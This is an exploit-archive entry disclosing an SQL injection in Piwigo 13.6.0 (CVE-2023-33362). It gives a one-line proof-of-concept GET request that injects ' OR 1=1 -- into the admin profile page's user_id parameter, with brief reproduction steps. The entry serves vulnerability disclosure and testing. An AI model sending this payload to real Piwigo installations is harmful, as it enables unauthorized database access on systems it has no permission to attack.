# Exploit Title: Piwigo 13.6.0 - SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/Piwigo/Piwigo # Software Link: https://github.com/Piwigo/Piwigo # Version: 13.6.0 # Tested on: Windows # CVE : CVE-2023-33362 Proof Of Concept: GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1 Host: piwigo Steps to Reproduce Login as an admin user. Send the request. Observe the result
Credits and Partners
All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
